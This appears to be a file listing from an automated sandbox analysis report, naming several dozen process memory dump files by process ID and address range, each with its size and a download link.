memory/5268-147-0x00000000048B0000-0x00000000048B1000-memory.dmp

Filesize
4KB

Download
memory/5268-199-0x000000007F5E0000-0x000000007F5E1000-memory.dmp

Filesize
4KB

Download
memory/5268-150-0x0000000007390000-0x0000000007391000-memory.dmp

Filesize
4KB

Download
memory/5268-149-0x00000000048B2000-0x00000000048B3000-memory.dmp

Filesize
4KB

Download
memory/5268-193-0x0000000009050000-0x0000000009083000-memory.dmp

Filesize
204KB

Download
memory/5268-146-0x0000000001330000-0x0000000001331000-memory.dmp

Filesize
4KB

Download
memory/5268-250-0x00000000090B0000-0x00000000090B1000-memory.dmp

Filesize
4KB

Download
memory/5268-166-0x0000000007110000-0x0000000007111000-memory.dmp

Filesize
4KB

Download
memory/5268-239-0x00000000094B0000-0x00000000094B1000-memory.dmp

Filesize
4KB

Download
memory/5268-170-0x0000000007BF0000-0x0000000007BF1000-memory.dmp

Filesize
4KB

Download
memory/5268-180-0x0000000008280000-0x0000000008281000-memory.dmp

Filesize
4KB

Download
memory/5284-292-0x000000006EE40000-0x000000006F52E000-memory.dmp

Filesize
6.9MB

Download
memory/5284-295-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/5284-298-0x0000000002300000-0x0000000002310000-memory.dmp

Filesize
64KB

Download
memory/5440-227-0x0000000002420000-0x0000000002465000-memory.dmp

Filesize
276KB

Download
memory/5440-223-0x00000000024A0000-0x00000000024A1000-memory.dmp

Filesize
4KB

Download
memory/5452-258-0x0000000000F00000-0x0000000000F01000-memory.dmp

Filesize
4KB

Download
memory/5452-243-0x00007FFF2A300000-0x00007FFF2ACEC000-memory.dmp

Filesize
9.9MB

Download
memory/5512-288-0x0000000006440000-0x000000000A835000-memory.dmp

Filesize
68.0MB

Download
memory/5520-251-0x0000000000B00000-0x0000000000B01000-memory.dmp

Filesize
4KB

Download
memory/5520-269-0x0000000005320000-0x0000000005321000-memory.dmp

Filesize
4KB

Download
memory/5520-246-0x000000006EE40000-0x000000006F52E000-memory.dmp

Filesize
6.9MB

Download
memory/5540-210-0x0000000003120000-0x0000000003121000-memory.dmp

Filesize
4KB

Download
memory/5540-220-0x0000000000400000-0x0000000000492000-memory.dmp

Filesize
584KB

Download
memory/5540-218-0x0000000002C80000-0x0000000002D11000-memory.dmp

Filesize
580KB

Download
memory/5548-207-0x0000000003650000-0x0000000003694000-memory.dmp

Filesize
272KB

Download
memory/5548-154-0x0000000000250000-0x000000000025D000-memory.dmp

Filesize
52KB

Download
memory/5880-179-0x0000000006C32000-0x0000000006C33000-memory.dmp

Filesize
4KB

Download
memory/5880-173-0x000000006EE40000-0x000000006F52E000-memory.dmp

Filesize
6.9MB

Download
memory/5880-224-0x000000007F500000-0x000000007F501000-memory.dmp

Filesize
4KB

Download
memory/5880-233-0x0000000006C33000-0x0000000006C34000-memory.dmp

Filesize
4KB

Download
memory/5880-178-0x0000000006C30000-0x0000000006C31000-memory.dmp

Filesize
4KB

Download
memory/5924-301-0x0000000005490000-0x0000000005491000-memory.dmp

Filesize
4KB

Download
memory/5924-293-0x0000000000C10000-0x0000000000C11000-memory.dmp

Filesize
4KB

Download
memory/5924-291-0x000000006EE40000-0x000000006F52E000-memory.dmp

Filesize
6.9MB

Download
memory/5924-296-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

Filesize
4KB

Download
memory/5924-302-0x0000000005440000-0x0000000005472000-memory.dmp

Filesize
200KB

Download
memory/5924-304-0x000000000AB30000-0x000000000AB31000-memory.dmp

Filesize
4KB

Download
memory/6068-305-0x0000000003150000-0x0000000003AF0000-memory.dmp

Filesize
9.6MB

Download
memory/6068-307-0x0000000003140000-0x0000000003142000-memory.dmp

Filesize
8KB

Download